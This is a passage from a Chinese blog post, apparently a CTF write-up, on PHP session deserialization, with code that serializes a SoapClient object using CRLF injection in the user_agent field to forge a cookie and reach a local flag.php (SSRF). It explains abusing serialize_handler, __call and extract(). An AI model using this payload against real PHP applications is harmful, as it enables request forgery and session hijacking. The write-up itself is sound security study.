<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$target</span> = <span class="hljs-string">&quot;http://127.0.0.1/flag.php&quot;</span>;<br><span class="hljs-variable">$attack</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">SoapClient</span>(<span class="hljs-literal">null</span>,<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;location&#x27;</span> =&gt; <span class="hljs-variable">$target</span>,<br>    <span class="hljs-string">&#x27;user_agent&#x27;</span> =&gt; <span class="hljs-string">&quot;abc\r\nCookie: PHPSESSID=123456\r\n&quot;</span>,<br>    <span class="hljs-string">&#x27;uri&#x27;</span> =&gt; <span class="hljs-string">&quot;123&quot;</span>));<br><span class="hljs-variable">$payload</span> = <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$attack</span>));<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$payload</span>;<br></code></pre></td></tr></table></figure>

<p>这里一般情况下用<code>ini_set</code>的，但是<code>ini_set</code>不能识别数组，所以换成了<code>session_start</code>，然后POST传入<code>serialize_handler=php_serialize</code></p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730524007737-6d4e4dc2-7263-4895-913f-1c7b2ca5b28d.png" srcset="/img/loading.gif" lazyload></p>
<p>接下来就是要想办法引用<code>SoapClient</code>类的<code>__call</code>方法了，这个我们需要调用<code>$a = array(reset($_SESSION), &#39;welcome_to_the_lctf2018&#39;);</code>，这个写法可以调用类里面的方法，可以学习一下，但是现在<code>$b = &#39;implode&#39;;</code>所以我们需要将<code>$b</code>覆盖，使用函数<code>&lt;font style=&quot;color:#000000;&quot;&gt;extract()&lt;/font&gt;</code></p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730524027565-1634d2f0-d89d-4d89-9a9a-309011dbc77e.png" srcset="/img/loading.gif" lazyload></p>
<p>并没有得到预期的结果，放到本地发现是无法动态调用<code>extract</code>，推测题目也是因为这个，如果动态调用了只要把<code>cookie</code>修改成伪造的<code>cookie</code>就可以得到<code>flag</code></p>
<h1 id="VOLUs"><font style="color:rgb(51, 51, 51);">参考文章</font></h1>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs css">https://xz.aliyun.com/t/<span class="hljs-number">6640</span>?time__1311=n4%<span class="hljs-number">2</span>BxnD0Dg7%<span class="hljs-number">3</span>DYqBK0QD%<span class="hljs-number">2</span>FiWReOCtG%<span class="hljs-number">3</span>DzihDBGoD<br>https://www.cnblogs.com/GTL-JU/p/<span class="hljs-number">16859098</span>.html<br></code></pre></td></tr></table></figure>




                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" class="category-chain-item">网络安全</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web%E6%8A%80%E6%9C%AF%E6%80%BB%E7%BB%93/" class="print-no-link">#web技术总结</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>session反序列化</div>
      <div>http://example.com/2024/12/01/session反序列化/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>unjoke</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年12月1日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/11/01/pearcmd.php%E7%9A%84%E5%A6%99%E7%94%A8/" title="pearcmd.php！万能的rce神">
                        <span class="hidden-mobile">pearcmd.php！万能的rce神</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
